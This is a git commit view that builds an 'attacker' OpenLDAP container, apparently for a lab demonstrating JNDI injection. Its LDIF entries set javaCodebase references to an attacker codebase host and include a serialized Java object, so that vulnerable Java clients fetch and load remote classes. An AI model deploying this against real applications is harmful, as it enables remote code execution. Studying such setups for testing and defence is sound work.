Browse Source

ldap configuration

master
Ivan Ivanov 8 months ago
parent
commit
f2876dc4ab
  1. 4
      attacker/Dockerfile
  2. 16
      attacker/README.md
  3. 4
      attacker/ldap/made-class.ldif
  4. 8
      attacker/ldap/security
  5. 15
      attacker/ldap/serialized-class.ldif
  6. 10
      attacker/serialized-class.ldif

4
attacker/Dockerfile

@ -0,0 +1,4 @@
FROM osixia/openldap:1.5.0
COPY ldap/security /container/service/slapd/assets/config/bootstrap/ldif/02-security.ldif
COPY ldap/*.ldif /container/service/slapd/assets/config/bootstrap/ldif/custom/

16
attacker/README.md

@ -1,5 +1,17 @@
# Attacker
Hosts an ldap with data from *.ldif files
Hosts an ldap with data from ldap/*.ldif files
Hosts an HTTP server serving built classes from files in ./src
Hosts an HTTP server serving built classes from files in ./src
## Usage
Build and run
cd attacker
docker build . -t badldap
docker run -d -p 1389:389 badldap
Test
ldapsearch -x -H ldap://localhost:1389 -b 'dc=example,dc=org'

4
attacker/made-class.ldif → attacker/ldap/made-class.ldif

@ -1,7 +1,7 @@
dn: cn=made-class,dc=ldap-registry,dc=attacker
dn: cn=made-class,dc=example,dc=org
cn: made-class
javaClassName: MadeClass
javaCodebase: http://attacker_codebase:80/
javaCodebase: http://localhost:8088/
javaFactory: FactoryClass
objectClass: top
objectClass: javaContainer

8
attacker/ldap/security

@ -0,0 +1,8 @@
dn: olcDatabase={1}{{ LDAP_BACKEND }},cn=config
changetype: modify
delete: olcAccess
-
add: olcAccess
olcAccess: to * by dn.exact=gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth manage by anonymous read
olcAccess: to attrs=userPassword,shadowLastChange by self write by dn="cn=admin,{{ LDAP_BASE_DN }}" write by anonymous read
olcAccess: to * by self read by dn="cn=admin,{{ LDAP_BASE_DN }}" write by anonymous read

15
attacker/ldap/serialized-class.ldif

@ -0,0 +1,15 @@
dn: cn=serialized-class,dc=ldap-registry,dc=attacker
cn: serialized-class
javaClassName: SerializedClass
javaClassNames: SerializedClass
javaClassNames: java.lang.Object
javaClassNames: java.io.Serializable
javaCodebase: http://attacker_codebase:80/
javaSerializedData:: rO0ABXNyAA9TZXJpYWxpemVkQ2xhc3MAAAAAAAAAKgIAAUwAB21lc3N
hZ2V0ABJMamF2YS9sYW5nL1N0cmluZzt4cHQAG1NlcmlhbGl6ZWQgT2JqZWN0J3MgTWVzc2FnZQ=
=
objectClass: top
objectClass: javaContainer
objectClass: javaObject
objectClass: javaSerializedObject

10
attacker/serialized-class.ldif

@ -1,10 +0,0 @@
dn: cn=made-class,dc=ldap-registry,dc=attacker
cn: made-class
javaClassName: MadeClass
javaCodebase: http://attacker_codebase:80/
javaFactory: FactoryClass
objectClass: top
objectClass: javaContainer
objectClass: javaObject
objectClass: javaNamingReference
Loading…
Cancel
Save